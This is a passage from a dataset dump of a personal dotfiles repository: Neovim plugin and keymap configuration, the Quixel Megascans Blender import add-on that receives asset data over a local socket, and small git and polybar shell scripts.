}\n\tuse(\"lukas-reineke/indent-blankline.nvim\")\n\tuse({ \"TimUntersberger/neogit\", requires = \"nvim-lua/plenary.nvim\" })\n\tuse(\"tpope/vim-fugitive\")\n use(\"tpope/vim-rhubarb\")\n\tuse(\"sindrets/diffview.nvim\")\n\tuse({ \"junegunn/fzf\", dir = \"~/.fzf\", run = \"./install --all\" })\n\t--use(\"junegunn/fzf.vim\")\n use{\n \"MaikKlein/fzf.vim\",\n branch = \"test\"\n }\n\tuse({\n\t\t\"pwntester/octo.nvim\",\n\t\tconfig = function()\n\t\t\trequire(\"octo\").setup()\n\t\tend,\n\t})\n\tuse(\"hoob3rt/lualine.nvim\")\n\t-- themes\n\tuse(\"sainnhe/sonokai\")\n\tuse(\"folke/tokyonight.nvim\")\n\tuse(\"Th3Whit3Wolf/one-nvim\")\nend, {\n\tdisplay = {\n\t\tborder = { \"┌\", \"─\", \"┐\", \"│\", \"┘\", \"─\", \"└\", \"│\" },\n\t},\n})\n" }, { "alpha_fraction": 0.5663161873817444, "alphanum_fraction": 0.5769934058189392, "avg_line_length": 45.68597412109375, "blob_id": "c47cb1d31ab9868f20b08710a018f787cd708f48", "content_id": "983d9e77d79823e140363fd9af3fcdb371713799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30626, "license_type": "no_license", "max_line_length": 181, "num_lines": 656, "path": "/blender/2.93/scripts/addons/MSPlugin/__init__.py", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "# ##### QUIXEL AB - MEGASCANS PLugin FOR BLENDER #####\n#\n# The Megascans Plugin plugin for Blender is an add-on that lets\n# you instantly import assets with their shader setup with one click only.\n#\n# Because it relies on some of the latest 2.80 features, this plugin is currently\n# only available for Blender 2.80 and forward.\n#\n# You are free to modify, add features or tweak this add-on as you see fit, and\n# don't hesitate to send us some feedback if you've done something cool with it.\n#\n# ##### QUIXEL AB - MEGASCANS PLUGIN FOR BLENDER #####\n\nimport bpy, threading, os, time, json, socket\nfrom bpy.app.handlers import persistent\n\nglobals()['Megascans_DataSet'] = None\n\n# This stuff is for the Alembic support\nglobals()['MG_Material'] = []\nglobals()['MG_AlembicPath'] = []\nglobals()['MG_ImportComplete'] = False\n\nbl_info = {\n \"name\": \"Megascans Plugin\",\n \"description\": \"Connects Blender to Quixel Bridge for one-click imports with shader setup and geometry\",\n \"author\": \"Quixel\",\n \"version\": (3, 2),\n \"blender\": (2, 80, 0),\n \"location\": \"File > Import\",\n \"warning\": \"\", # used for warning icon and text in addons panel\n \"wiki_url\": \"https://docs.quixel.org/bridge/livelinks/blender/info_quickstart.html\",\n \"tracker_url\": \"https://docs.quixel.org/bridge/livelinks/blender/info_quickstart#release_notes\",\n \"support\": \"COMMUNITY\",\n \"category\": \"Import-Export\"\n}\n\n\n# MS_Init_ImportProcess is the main asset import class.\n# This class is invoked whenever a new asset is set from Bridge.\n\nclass MS_Init_ImportProcess():\n\n # This initialization method create the data structure to process our assets\n # later on in the initImportProcess method. The method loops on all assets\n # that have been sent by Bridge.\n def __init__(self):\n print(\"Initialized import class...\")\n try:\n # Check if there's any incoming data\n if globals()['Megascans_DataSet'] != None:\n\n globals()['MG_AlembicPath'] = []\n globals()['MG_Material'] = []\n globals()['MG_ImportComplete'] = False\n\n self.json_Array = json.loads(globals()['Megascans_DataSet'])\n\n # Start looping over each asset in the self.json_Array list\n for js in self.json_Array:\n\n self.json_data = js\n\n self.selectedObjects = []\n \n self.IOR = 1.45\n self.assetType = self.json_data[\"type\"]\n self.assetPath = self.json_data[\"path\"]\n self.assetID = self.json_data[\"id\"]\n self.isMetal = bool(self.json_data[\"category\"] == \"Metal\")\n # Workflow setup.\n self.isHighPoly = bool(self.json_data[\"activeLOD\"] == \"high\")\n self.activeLOD = self.json_data[\"activeLOD\"]\n self.minLOD = self.json_data[\"minLOD\"]\n self.RenderEngine = bpy.context.scene.render.engine.lower() # Get the current render engine. i.e. blender_eevee or cycles\n self.Workflow = self.json_data.get('pbrWorkflow', 'specular')\n self.DisplacementSetup = 'regular'\n self.isCycles = bool(self.RenderEngine == 'cycles')\n self.isScatterAsset = self.CheckScatterAsset()\n self.textureList = []\n self.isBillboard = self.CheckIsBillboard()\n self.ApplyToSelection = False\n self.isSpecularWorkflow = True\n self.isAlembic = False\n\n self.NormalSetup = False\n self.BumpSetup = False\n\n if \"workflow\" in self.json_data.keys():\n self.isSpecularWorkflow = bool(self.json_data[\"workflow\"] == \"specular\")\n\n if \"applyToSelection\" in self.json_data.keys():\n self.ApplyToSelection = bool(self.json_data[\"applyToSelection\"])\n\n if (self.isCycles):\n if(bpy.context.scene.cycles.feature_set == 'EXPERIMENTAL'):\n self.DisplacementSetup = 'adaptive'\n \n texturesListName = \"components\"\n if(self.isBillboard):\n texturesListName = \"components\"\n\n # Get a list of all available texture maps. item[1] returns the map type (albedo, normal, etc...).\n self.textureTypes = [obj[\"type\"] for obj in self.json_data[texturesListName]]\n self.textureList = []\n\n for obj in self.json_data[texturesListName]:\n texFormat = obj[\"format\"]\n texType = obj[\"type\"]\n texPath = obj[\"path\"]\n\n if texType == \"displacement\" and texFormat != \"exr\":\n texDir = os.path.dirname(texPath)\n texName = os.path.splitext(os.path.basename(texPath))[0]\n\n if os.path.exists(os.path.join(texDir, texName + \".exr\")):\n texPath = os.path.join(texDir, texName + \".exr\")\n texFormat = \"exr\"\n # Replace diffuse texture type with albedo so we don't have to add more conditions to handle diffuse map.\n if texType == \"diffuse\" and \"albedo\" not in self.textureTypes:\n texType = \"albedo\"\n self.textureTypes.append(\"albedo\")\n self.textureTypes.remove(\"diffuse\")\n\n # Normal / Bump setup checks\n if texType == \"normal\":\n self.NormalSetup = True\n if texType == \"bump\":\n self.BumpSetup = True\n\n self.textureList.append((texFormat, texType, texPath))\n\n # Create a tuple list of all the 3d meshes available.\n # This tuple is composed of (meshFormat, meshPath)\n self.geometryList = [(obj[\"format\"], obj[\"path\"]) for obj in self.json_data[\"meshList\"]]\n\n # Create name of our asset. Multiple conditions are set here\n # in order to make sure the asset actually has a name and that the name\n # is short enough for us to use it. We compose a name with the ID otherwise.\n if \"name\" in self.json_data.keys():\n self.assetName = self.json_data[\"name\"].replace(\" \", \"_\")\n else:\n self.assetName = os.path.basename(self.json_data[\"path\"]).replace(\" \", \"_\")\n if len(self.assetName.split(\"_\")) > 2:\n self.assetName = \"_\".join(self.assetName.split(\"_\")[:-1])\n\n self.materialName = self.assetName + '_' + self.assetID\n self.colorSpaces = [\"sRGB\", \"Non-Color\", \"Linear\"]\n\n # Initialize the import method to start building our shader and import our geometry\n self.initImportProcess()\n print(\"Imported asset from \" + self.assetName + \" Quixel Bridge\")\n \n if len(globals()['MG_AlembicPath']) > 0:\n globals()['MG_ImportComplete'] = True \n except Exception as e:\n print( \"Megascans Plugin Error initializing the import process. Error: \", str(e) )\n \n globals()['Megascans_DataSet'] = None\n \n # this method is used to import the geometry and create the material setup.\n def initImportProcess(self):\n try:\n if len(self.textureList) >= 1:\n \n if(self.ApplyToSelection and self.assetType not in [\"3dplant\", \"3d\"]):\n self.CollectSelectedObjects()\n\n self.ImportGeometry()\n self.CreateMaterial()\n self.ApplyMaterialToGeometry()\n if(self.isScatterAsset and len(self.selectedObjects) > 1):\n self.ScatterAssetSetup()\n elif (self.assetType == \"3dplant\" and len(self.selectedObjects) > 1):\n self.PlantAssetSetup()\n\n self.SetupMaterial()\n\n if self.isAlembic:\n globals()['MG_Material'].append(self.mat)\n\n except Exception as e:\n print( \"Megascans Plugin Error while importing textures/geometry or setting up material. Error: \", str(e) )\n\n def ImportGeometry(self):\n try:\n # Import geometry\n abcPaths = []\n if len(self.geometryList) >= 1:\n for obj in self.geometryList:\n meshPath = obj[1]\n meshFormat = obj[0]\n\n if meshFormat.lower() == \"fbx\":\n bpy.ops.import_scene.fbx(filepath=meshPath)\n # get selected objects\n obj_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n self.selectedObjects += obj_objects\n\n elif meshFormat.lower() == \"obj\":\n bpy.ops.import_scene.obj(filepath=meshPath, use_split_objects = True, use_split_groups = True, global_clight_size = 1.0)\n # get selected objects\n obj_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n self.selectedObjects += obj_objects\n\n elif meshFormat.lower() == \"abc\":\n self.isAlembic = True\n abcPaths.append(meshPath)\n \n if self.isAlembic:\n globals()['MG_AlembicPath'].append(abcPaths)\n except Exception as e:\n print( \"Megascans Plugin Error while importing textures/geometry or setting up material. Error: \", str(e) )\n\n def dump(self, obj):\n for attr in dir(obj):\n print(\"obj.%s = %r\" % (attr, getattr(obj, attr)))\n\n def CollectSelectedObjects(self):\n try:\n sceneSelectedObjects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n for obj in sceneSelectedObjects:\n if obj.type == \"MESH\":\n self.selectedObjects.append(obj)\n except Exception as e:\n print(\"Megascans Plugin Error::CollectSelectedObjects::\", str(e) )\n\n def ApplyMaterialToGeometry(self):\n for obj in self.selectedObjects:\n # assign material to obj\n obj.active_material = self.mat\n\n def CheckScatterAsset(self):\n if('scatter' in self.json_data['categories'] or 'scatter' in self.json_data['tags'] or 'cmb_asset' in self.json_data['categories'] or 'cmb_asset' in self.json_data['tags']):\n return True\n return False\n\n def CheckIsBillboard(self):\n # Use billboard textures if importing the Billboard LOD.\n if(self.assetType == \"3dplant\"):\n if (self.activeLOD == self.minLOD):\n return True\n return False\n\n #Add empty parent for the scatter assets.\n def ScatterAssetSetup(self):\n bpy.ops.object.empty_add(type='ARROWS')\n emptyRefList = [ o for o in bpy.context.scene.objects if o.select_get() and o not in self.selectedObjects ]\n for scatterParentObject in emptyRefList:\n scatterParentObject.name = self.assetID + \"_\" + self.assetName\n for obj in self.selectedObjects:\n obj.parent = scatterParentObject\n break\n \n #Add empty parent for plants.\n def PlantAssetSetup(self):\n bpy.ops.object.empty_add(type='ARROWS')\n emptyRefList = [ o for o in bpy.context.scene.objects if o.select_get() and o not in self.selectedObjects ]\n for plantParentObject in emptyRefList:\n plantParentObject.name = self.assetID + \"_\" + self.assetName\n for obj in self.selectedObjects:\n obj.parent = plantParentObject\n break\n\n # def AddModifiersToGeomtry(self, geo_list, mat):\n # for obj in geo_list:\n # # assign material to obj\n # bpy.ops.object.modifier_add(type='SOLIDIFY')\n\n #Shader setups for all asset types. Some type specific functionality is also handled here.\n def SetupMaterial (self):\n if \"albedo\" in self.textureTypes:\n if \"ao\" in self.textureTypes:\n self.CreateTextureMultiplyNode(\"albedo\", \"ao\", -250, 320, -640, 460, -640, 200, 0, 1, True, 0)\n else:\n self.CreateTextureNode(\"albedo\", -640, 420, 0, True, 0)\n \n if self.isSpecularWorkflow:\n if \"specular\" in self.textureTypes:\n self.CreateTextureNode(\"specular\", -1150, 200, 0, True, 5)\n \n if \"gloss\" in self.textureTypes:\n glossNode = self.CreateTextureNode(\"gloss\", -1150, -60)\n invertNode = self.CreateGenericNode(\"ShaderNodeInvert\", -250, 60)\n # Add glossNode to invertNode connection\n self.mat.node_tree.links.new(invertNode.inputs[1], glossNode.outputs[0])\n # Connect roughness node to the material parent node.\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[7], invertNode.outputs[0])\n elif \"roughness\" in self.textureTypes:\n self.CreateTextureNode(\"roughness\", -1150, -60, 1, True, 7)\n else:\n if \"metalness\" in self.textureTypes:\n self.CreateTextureNode(\"metalness\", -1150, 200, 1, True, 4)\n \n if \"roughness\" in self.textureTypes:\n self.CreateTextureNode(\"roughness\", -1150, -60, 1, True, 7)\n elif \"gloss\" in self.textureTypes:\n glossNode = self.CreateTextureNode(\"gloss\", -1150, -60)\n invertNode = self.CreateGenericNode(\"ShaderNodeInvert\", -250, 60)\n # Add glossNode to invertNode connection\n self.mat.node_tree.links.new(invertNode.inputs[1], glossNode.outputs[0])\n # Connect roughness node to the material parent node.\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[7], invertNode.outputs[0])\n \n if \"opacity\" in self.textureTypes:\n self.CreateTextureNode(\"opacity\", -1550, -160, 1, True, 18)\n self.mat.blend_method = 'HASHED'\n\n if \"translucency\" in self.textureTypes:\n self.CreateTextureNode(\"translucency\", -1550, -420, 0, True, 15)\n elif \"transmission\" in self.textureTypes:\n self.CreateTextureNode(\"transmission\", -1550, -420, 1, True, 15)\n\n # If HIGH POLY selected > use normal_bump and no displacement\n # If LODs selected > use corresponding LODs normal + displacement\n if self.isHighPoly:\n self.BumpSetup = False\n self.CreateNormalNodeSetup(True, 19)\n\n if \"displacement\" in self.textureTypes and not self.isHighPoly:\n self.CreateDisplacementSetup(True)\n\n def CreateMaterial(self):\n self.mat = (bpy.data.materials.get( self.materialName ) or bpy.data.materials.new( self.materialName ))\n self.mat.use_nodes = True\n self.nodes = self.mat.node_tree.nodes\n self.parentName = \"Principled BSDF\"\n self.materialOutputName = \"Material Output\"\n\n self.mat.node_tree.nodes[self.parentName].distribution = 'MULTI_GGX'\n self.mat.node_tree.nodes[self.parentName].inputs[4].default_value = 1 if self.isMetal else 0 # Metallic value\n self.mat.node_tree.nodes[self.parentName].inputs[14].default_value = self.IOR\n \n self.mappingNode = None\n\n if self.isCycles and self.assetType not in [\"3d\", \"3dplant\"]:\n # Create mapping node.\n self.mappingNode = self.CreateGenericNode(\"ShaderNodeMapping\", -1950, 0)\n self.mappingNode.vector_type = 'TEXTURE'\n # Create texture coordinate node.\n texCoordNode = self.CreateGenericNode(\"ShaderNodeTexCoord\", -2150, -200)\n # Connect texCoordNode to the mappingNode\n self.mat.node_tree.links.new(self.mappingNode.inputs[0], texCoordNode.outputs[0])\n\n def CreateTextureNode(self, textureType, PosX, PosY, colorspace = 1, connectToMaterial = False, materialInputIndex = 0):\n texturePath = self.GetTexturePath(textureType)\n textureNode = self.CreateGenericNode('ShaderNodeTexImage', PosX, PosY)\n textureNode.image = bpy.data.images.load(texturePath)\n textureNode.show_texture = True\n textureNode.image.colorspace_settings.name = self.colorSpaces[colorspace] # \"sRGB\", \"Non-Color\", \"Linear\"\n \n if textureType in [\"albedo\", \"specular\", \"translucency\"]:\n if self.GetTextureFormat(textureType) in \"exr\":\n textureNode.image.colorspace_settings.name = self.colorSpaces[2] # \"sRGB\", \"Non-Color\", \"Linear\"\n\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, textureNode)\n # If it is Cycles render we connect it to the mapping node.\n if self.isCycles and self.assetType not in [\"3d\", \"3dplant\"]:\n self.mat.node_tree.links.new(textureNode.inputs[0], self.mappingNode.outputs[0])\n return textureNode\n\n def CreateTextureMultiplyNode(self, aTextureType, bTextureType, PosX, PosY, aPosX, aPosY, bPosX, bPosY, aColorspace, bColorspace, connectToMaterial, materialInputIndex):\n #Add Color>MixRGB node, transform it in the node editor, change it's operation to Multiply and finally we colapse the node.\n multiplyNode = self.CreateGenericNode('ShaderNodeMixRGB', PosX, PosY)\n multiplyNode.blend_type = 'MULTIPLY'\n #Setup A and B nodes\n textureNodeA = self.CreateTextureNode(aTextureType, aPosX, aPosY, aColorspace)\n textureNodeB = self.CreateTextureNode(bTextureType, bPosX, bPosY, bColorspace)\n # Conned albedo and ao node to the multiply node.\n self.mat.node_tree.links.new(multiplyNode.inputs[1], textureNodeA.outputs[0])\n self.mat.node_tree.links.new(multiplyNode.inputs[2], textureNodeB.outputs[0])\n\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, multiplyNode)\n\n return multiplyNode\n\n def CreateNormalNodeSetup(self, connectToMaterial, materialInputIndex):\n \n bumpNode = None\n normalNode = None\n bumpMapNode = None\n normalMapNode = None\n\n if self.NormalSetup and self.BumpSetup:\n bumpMapNode = self.CreateTextureNode(\"bump\", -640, -130)\n normalMapNode = self.CreateTextureNode(\"normal\", -1150, -580)\n bumpNode = self.CreateGenericNode(\"ShaderNodeBump\", -250, -170)\n bumpNode.inputs[0].default_value = 0.1\n normalNode = self.CreateGenericNode(\"ShaderNodeNormalMap\", -640, -400)\n # Add normalMapNode to normalNode connection\n self.mat.node_tree.links.new(normalNode.inputs[1], normalMapNode.outputs[0])\n # Add bumpMapNode and normalNode connection to the bumpNode\n self.mat.node_tree.links.new(bumpNode.inputs[2], bumpMapNode.outputs[0])\n if (2, 81, 0) > bpy.app.version:\n self.mat.node_tree.links.new(bumpNode.inputs[3], normalNode.outputs[0])\n else:\n self.mat.node_tree.links.new(bumpNode.inputs[5], normalNode.outputs[0])\n # Add bumpNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, bumpNode)\n elif self.NormalSetup:\n normalMapNode = self.CreateTextureNode(\"normal\", -640, -207)\n normalNode = self.CreateGenericNode(\"ShaderNodeNormalMap\", -250, -170)\n # Add normalMapNode to normalNode connection\n self.mat.node_tree.links.new(normalNode.inputs[1], normalMapNode.outputs[0])\n # Add normalNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, normalNode)\n elif self.BumpSetup:\n bumpMapNode = self.CreateTextureNode(\"bump\", -640, -207)\n bumpNode = self.CreateGenericNode(\"ShaderNodeBump\", -250, -170)\n bumpNode.inputs[0].default_value = 0.1\n # Add bumpMapNode and normalNode connection to the bumpNode\n self.mat.node_tree.links.new(bumpNode.inputs[2], bumpMapNode.outputs[0])\n # Add bumpNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, bumpNode)\n\n def CreateDisplacementSetup(self, connectToMaterial):\n if self.DisplacementSetup == \"adaptive\":\n # Add vector>displacement map node\n displacementNode = self.CreateGenericNode(\"ShaderNodeDisplacement\", 10, -400)\n displacementNode.inputs[2].default_value = 0.1\n displacementNode.inputs[1].default_value = 0\n # Add converter>RGB Separator node\n RGBSplitterNode = self.CreateGenericNode(\"ShaderNodeSeparateRGB\", -250, -499)\n # Import normal map and normal map node setup.\n displacementMapNode = self.CreateTextureNode(\"displacement\", -640, -740)\n # Add displacementMapNode to RGBSplitterNode connection\n self.mat.node_tree.links.new(RGBSplitterNode.inputs[0], displacementMapNode.outputs[0])\n # Add RGBSplitterNode to displacementNode connection\n self.mat.node_tree.links.new(displacementNode.inputs[0], RGBSplitterNode.outputs[0])\n # Add normalNode connection to the material output displacement node\n if connectToMaterial:\n self.mat.node_tree.links.new(self.nodes.get(self.materialOutputName).inputs[2], displacementNode.outputs[0])\n self.mat.cycles.displacement_method = 'BOTH'\n\n if self.DisplacementSetup == \"regular\":\n pass \n\n def ConnectNodeToMaterial(self, materialInputIndex, textureNode):\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[materialInputIndex], textureNode.outputs[0])\n\n def CreateGenericNode(self, nodeName, PosX, PosY):\n genericNode = self.nodes.new(nodeName)\n genericNode.location = (PosX, PosY)\n return genericNode\n\n def GetTexturePath(self, textureType):\n for item in self.textureList:\n if item[1] == textureType:\n return item[2].replace(\"\\\\\", \"/\")\n\n def GetTextureFormat(self, textureType):\n for item in self.textureList:\n if item[1] == textureType:\n return item[0].lower()\n\nclass ms_Init(threading.Thread):\n \n\t#Initialize the thread and assign the method (i.e. importer) to be called when it receives JSON data.\n def __init__(self, importer):\n threading.Thread.__init__(self)\n self.importer = importer\n\n\t#Start the thread to start listing to the port.\n def run(self):\n try:\n run_livelink = True\n host, port = 'localhost', 28888\n #Making a socket object.\n socket_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #Binding the socket to host and port number mentioned at the start.\n socket_.bind((host, port))\n\n #Run until the thread starts receiving data.\n while run_livelink:\n socket_.listen(5)\n #Accept connection request.\n client, addr = socket_.accept()\n data = \"\"\n buffer_size = 4096*2\n #Receive data from the client. \n data = client.recv(buffer_size)\n if data == b'Bye Megascans':\n run_livelink = False\n break\n\n #If any data is received over the port.\n if data != \"\":\n self.TotalData = b\"\"\n self.TotalData += data #Append the previously received data to the Total Data.\n #Keep running until the connection is open and we are receiving data.\n while run_livelink:\n #Keep receiving data from client.\n data = client.recv(4096*2)\n if data == b'Bye Megascans':\n run_livelink = False\n break\n #if we are getting data keep appending it to the Total data.\n if data : self.TotalData += data\n else:\n #Once the data transmission is over call the importer method and send the collected TotalData.\n self.importer(self.TotalData)\n break\n except Exception as e:\n print( \"Megascans Plugin Error initializing the thread. Error: \", str(e) )\n\nclass thread_checker(threading.Thread):\n \n\t#Initialize the thread and assign the method (i.e. importer) to be called when it receives JSON data.\n def __init__(self):\n threading.Thread.__init__(self)\n\n\t#Start the thread to start listing to the port.\n def run(self):\n try:\n run_checker = True\n while run_checker:\n time.sleep(3)\n for i in threading.enumerate():\n if(i.getName() == \"MainThread\" and i.is_alive() == False):\n host, port = 'localhost', 28888\n s = socket.socket()\n s.connect((host,port))\n data = \"Bye Megascans\"\n s.send(data.encode())\n s.close()\n run_checker = False\n break\n except Exception as e:\n print( \"Megascans Plugin Error initializing thread checker. Error: \", str(e) )\n pass\n\nclass MS_Init_LiveLink(bpy.types.Operator):\n\n bl_idname = \"bridge.plugin\"\n bl_label = \"Megascans Plugin\"\n socketCount = 0\n\n def execute(self, context):\n\n try:\n globals()['Megascans_DataSet'] = None\n self.thread_ = threading.Thread(target = self.socketMonitor)\n self.thread_.start()\n bpy.app.timers.register(self.newDataMonitor)\n return {'FINISHED'}\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin. Error: \", str(e) )\n return {\"FAILED\"}\n\n def newDataMonitor(self):\n try:\n if globals()['Megascans_DataSet'] != None:\n MS_Init_ImportProcess()\n globals()['Megascans_DataSet'] = None \n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (newDataMonitor). Error: \", str(e) )\n return {\"FAILED\"}\n return 1.0\n\n\n def socketMonitor(self):\n try:\n #Making a thread object\n threadedServer = ms_Init(self.importer)\n #Start the newly created thread.\n threadedServer.start()\n #Making a thread object\n thread_checker_ = thread_checker()\n #Start the newly created thread.\n thread_checker_.start()\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (socketMonitor). Error: \", str(e) )\n return {\"FAILED\"}\n\n def importer (self, recv_data):\n try:\n globals()['Megascans_DataSet'] = recv_data\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (importer). Error: \", str(e) )\n return {\"FAILED\"}\n\nclass MS_Init_Abc(bpy.types.Operator):\n\n bl_idname = \"ms_livelink_abc.py\"\n bl_label = \"Import ABC\"\n\n def execute(self, context):\n\n try:\n if globals()['MG_ImportComplete']:\n \n assetMeshPaths = globals()['MG_AlembicPath']\n assetMaterials = globals()['MG_Material']\n \n if len(assetMeshPaths) > 0 and len(assetMaterials) > 0:\n\n materialIndex = 0\n old_materials = []\n for meshPaths in assetMeshPaths:\n for meshPath in meshPaths:\n bpy.ops.wm.alembic_import(filepath=meshPath, as_background_job=False)\n for o in bpy.context.scene.objects:\n if o.select_get():\n old_materials.append(o.active_material)\n o.active_material = assetMaterials[materialIndex]\n \n \n materialIndex += 1\n \n for mat in old_materials:\n try:\n if mat is not None:\n bpy.data.materials.remove(mat)\n except:\n pass\n\n globals()['MG_AlembicPath'] = []\n globals()['MG_Material'] = []\n globals()['MG_ImportComplete'] = False\n\n return {'FINISHED'}\n except Exception as e:\n print( \"Megascans Plugin Error starting MS_Init_Abc. Error: \", str(e) )\n return {\"CANCELLED\"}\n\n@persistent\ndef load_plugin(scene):\n try:\n bpy.ops.bridge.plugin()\n except Exception as e:\n print( \"Bridge Plugin Error::Could not start the plugin. Description: \", str(e) )\n\ndef menu_func_import(self, context):\n self.layout.operator(MS_Init_Abc.bl_idname, text=\"Megascans: Import Alembic Files\")\n\ndef register():\n if len(bpy.app.handlers.load_post) > 0:\n # Check if trying to register twice.\n if \"load_plugin\" in bpy.app.handlers.load_post[0].__name__.lower() or load_plugin in bpy.app.handlers.load_post:\n return\n bpy.utils.register_class(MS_Init_LiveLink)\n bpy.utils.register_class(MS_Init_Abc)\n bpy.app.handlers.load_post.append(load_plugin)\n bpy.types.TOPBAR_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)\n if len(bpy.app.handlers.load_post) > 0:\n # Check if trying to register twice.\n if \"load_plugin\" in bpy.app.handlers.load_post[0].__name__.lower() or load_plugin in bpy.app.handlers.load_post:\n bpy.app.handlers.load_post.remove(load_plugin)\n" }, { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 38.66666793823242, "blob_id": "e86c8e664a021a2ea874419f61f80278d094707a", "content_id": "bb2defafe9b288fc05a5c0b9378ba1147b0a432f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/gitconfig.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "git config --global user.email \"[email protected]\"\ngit config --global user.name \"Maik Klein\"\nssh-keygen -t rsa -b 4096 -C \"[email protected]\"\n\n" }, { "alpha_fraction": 0.5494505763053894, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 29.33333396911621, "blob_id": "b671434077267896d8bcfe85f622446b4e147932", "content_id": "165912574f4d698d46f52ee8258aa4885ffdd3d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 91, "license_type": "no_license", "max_line_length": 47, "num_lines": 3, "path": "/penrose/config/polybar/layout_from_penrose_log.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\ntail -F ~/.penrose.log |\n awk '/\\[INFO\\] ACTIVE_LAYOUT/ { print $4 }'\n" }, { "alpha_fraction": 0.44211718440055847, "alphanum_fraction": 0.4445028603076935, "avg_line_length": 34.8420295715332, "blob_id": "e4c430e0c9f9230e68b7a45a347b136e6d42a974", "content_id": "301e1a56885eef2dd53c90c573d51826a1788ac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 24731, "license_type": "no_license", "max_line_length": 142, "num_lines": 690, "path": "/nvim/init.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local lazypath = vim.fn.stdpath(\"data\") .. \"/lazy/lazy.nvim\"\nif not vim.loop.fs_stat(lazypath) then\n vim.fn.system({\n \"git\",\n \"clone\",\n \"--filter=blob:none\",\n \"--single-branch\",\n \"https://github.com/folke/lazy.nvim.git\",\n lazypath,\n })\nend\nvim.opt.runtimepath:prepend(lazypath)\n\nlocal vim = vim\nlocal g = vim.g\nlocal cmd = vim.cmd\n\nvim.o.ruler = false\nvim.o.hidden = true\nvim.o.ignorecase = true\nvim.o.splitbelow = true\nvim.o.splitright = true\nvim.o.termguicolors = true\nvim.o.cul = true\nvim.o.mouse = \"a\"\nvim.o.signcolumn = \"no\"\nvim.o.cmdheight = 1\nvim.o.updatetime = 250 -- update interval for gitsigns\nvim.o.timeoutlen = 400\nvim.o.completeopt = 'menu,menuone,noselect'\nvim.o.expandtab = true\nvim.o.smartindent = true\nvim.opt.whichwrap:append(\"<>hl\")\nvim.o.pumheight = 20\nvim.o.foldmethod = \"manual\"\nvim.o.list = true\nvim.o.smartindent = true\nvim.o.expandtab = true\nvim.o.syntax = \"on\"\nvim.o.shiftwidth = 4\nvim.o.tabstop = 4\nvim.o.virtualedit = \"\"\nvim.o.number = true\nvim.o.relativenumber = true\nvim.o.sessionoptions = \"curdir,winpos,winsize,tabpages,globals\"\nvim.o.tm = 2000\nvim.o.smarttab = true\nvim.o.background = \"dark\"\nvim.o.breakindent = true\n\ng.mapleader = \" \"\ng.auto_save = 0\ng.backspace = \"eol,start,indent\"\ng.whichwrap = \"<,>,h,l\"\n\nlocal mycolorscheme = 'tokyonight'\n\ncmd(\"set noswapfile\")\n\nfor i = 1, 9 do\n vim.keymap.set(\"n\", \"<leader>o\" .. i, i .. \"gt\", { desc = 'Go to Tab ' .. i })\n vim.keymap.set(\"n\", \"<leader>om\" .. i, \":tabm\" .. i .. \"<CR>\", {})\n vim.keymap.set(\"n\", \"<leader>\" .. i, \":\" .. i .. \"wincmd w<CR>\", {})\nend\n\nvim.keymap.set(\"n\", \"<leader>od\", \":tabclose<CR>\", {})\nvim.keymap.set(\"n\", \"<leader>oc\", \":tabnew<CR>:tabmove<CR>\", {})\n\nvim.keymap.set(\"n\", \"<leader>sc\", \":noh<CR>\", {})\nvim.keymap.set(\"i\", \"<C-s>\", \"<esc>:w<CR>\", {})\nvim.keymap.set(\"n\", \"<C-s>\", \":w<CR>\", {})\n\nvim.keymap.set(\"n\", \"D\", \"<C-d>\", {})\nvim.keymap.set(\"n\", \"U\", \"<C-u>\", {})\n\nvim.keymap.set(\"n\", \"{\", \"[{\", {})\nvim.keymap.set(\"n\", \"}\", \"]}\", {})\n\nvim.keymap.set(\"n\", \"(\", \"[(\", {})\nvim.keymap.set(\"n\", \")\", \"])\", {})\n\nvim.keymap.set(\"n\", \"<leader>y\", '\"+y', {})\nvim.keymap.set(\"v\", \"<leader>y\", '\"+y', {})\n\nvim.keymap.set('n', '<leader>vr', ':source $MYVIMRC<CR>', {})\nvim.keymap.set('n', '<leader>vq', ':wqa!<CR>', {})\nvim.keymap.set('n', '<leader>voc', ':e $MYVIMRC<CR>', {})\n\nvim.keymap.set(\"v\", \"<C-DOWN>\", \":m '>+1<CR>gv=gv\")\nvim.keymap.set(\"v\", \"<C-UP>\", \":m '<-2<CR>gv=gv\")\n\nvim.keymap.set(\"n\", \"J\", \"mzJ`z\")\nvim.keymap.set(\"n\", \"<C-d>\", \"<C-d>zz\")\nvim.keymap.set(\"n\", \"<C-u>\", \"<C-u>zz\")\nvim.keymap.set(\"n\", \"n\", \"nzzzv\")\nvim.keymap.set(\"n\", \"N\", \"Nzzzv\")\n\nvim.keymap.set({ \"i\", 